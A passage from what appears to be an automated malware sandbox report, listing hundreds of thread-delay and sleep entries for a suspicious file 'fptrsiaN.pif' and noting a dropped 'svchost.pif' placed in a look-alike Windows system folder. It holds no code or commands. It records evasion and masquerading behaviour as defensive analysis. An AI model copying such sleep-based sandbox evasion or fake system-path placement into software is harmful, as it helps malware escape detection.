          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598284
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598052
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597567
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597360
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597199
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597035
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596755
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596605
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596404
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596252
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596134
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595992
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595856
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595672
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595453
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595300
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595176
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594804
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594691
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594567
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594442
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594317
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594192
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594067
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593942
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593817
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593692
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593567
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593442
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593317
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593192
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 593067
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592942
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592817
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592704
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592567
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592442
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592317
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592191
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 592067
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591942
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591817
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591692
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591567
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591442
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591301
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591176
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 591051
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 590926
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 590801
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 590676
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 590551
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 600000
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599890
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599781
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599672
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599562
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599453
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599343
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599234
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599125
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 599015
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598905
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598787
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598671
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598562
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598453
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598344
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598234
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598125
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 598015
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597906
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597771
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597656
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597546
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597437
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597319
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597203
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 597081
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596953
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596839
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596584
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596468
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596359
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596250
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596140
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 596031
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595922
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595812
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595703
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595594
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595484
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595364
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595250
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595140
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 595031
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594922
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594812
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594703
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594594
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594484
          Source: C:\Users\Public\Libraries\fptrsiaN.pifThread delayed: delay time: 594374
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifWindow / User API: threadDelayed 2661Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifWindow / User API: threadDelayed 7092Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pifWindow / User API: threadDelayed 5630
          Source: C:\Users\Public\Libraries\fptrsiaN.pifWindow / User API: threadDelayed 4109
          Source: C:\Users\Public\Libraries\fptrsiaN.pifWindow / User API: threadDelayed 4923
          Source: C:\Users\Public\Libraries\fptrsiaN.pifWindow / User API: threadDelayed 4926
          Source: C:\Users\user\AppData\Local\Temp\x.exeDropped PE file which has not been started: C:\Windows \SysWOW64\svchost.pifJump to dropped file
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -31359464925306218s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -599873s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 1804Thread sleep count: 2661 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 1804Thread sleep count: 7092 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -599765s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -599656s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -599541s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -599396s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -599224s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -599104s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -598985s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -598860s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -598735s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -598610s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -598485s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -598360s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -598235s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -598110s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -597985s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -597860s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -597735s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -597610s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -597485s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -597360s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -597235s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -597110s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -596985s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -596860s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -596682s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -596576s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -596465s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -596344s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -596219s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -596110s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -595985s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -595860s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -595703s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -595592s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -595485s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -595360s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -595235s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -595110s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -594985s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -594861s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -594735s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -594609s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -594475s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -594368s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -594242s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -594132s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -593799s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -593503s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -593306s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -593168s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -593034s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -592787s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -592648s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -592506s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -592315s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -592141s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -592000s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -591878s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -591741s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -591617s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 4856Thread sleep time: -591362s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep count: 38 > 30
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -35048813740048126s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -600000s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -599829s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 1772Thread sleep count: 5630 > 30
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 1772Thread sleep count: 4109 > 30
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -599701s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -599583s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -599462s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -599350s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -599237s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -599125s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -599016s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -598872s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -598725s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -598591s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -598443s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -598284s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -598052s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -597567s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -597360s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -597199s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -597035s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -596755s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -596605s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -596404s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -596252s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -596134s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -595992s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -595856s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -595672s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -595453s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -595300s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -595176s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -594804s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -594691s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -594567s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -594442s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -594317s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -594192s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -594067s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -593942s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -593817s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -593692s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -593567s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -593442s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -593317s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -593192s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -593067s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -592942s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -592817s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -592704s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -592567s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -592442s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -592317s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -592191s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -592067s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -591942s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -591817s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -591692s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -591567s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -591442s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -591301s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -591176s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -591051s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -590926s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -590801s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -590676s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 3608Thread sleep time: -590551s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep count: 36 > 30
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -33204139332677172s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -600000s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 5052Thread sleep count: 4923 > 30
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -599890s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 5052Thread sleep count: 4926 > 30
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -599781s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -599672s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -599562s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -599453s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -599343s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -599234s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -599125s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -599015s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -598905s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -598787s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -598671s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -598562s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -598453s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -598344s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -598234s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -598125s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -598015s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -597906s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -597771s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -597656s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -597546s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -597437s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -597319s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -597203s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -597081s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -596953s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -596839s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -596584s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -596468s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -596359s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -596250s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -596140s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -596031s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -595922s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -595812s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -595703s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -595594s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -595484s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -595364s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -595250s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -595140s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -595031s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -594922s >= -30000s
          Source: C:\Users\Public\Libraries\fptrsiaN.pif TID: 6836Thread sleep time: -594812s >= -30000s
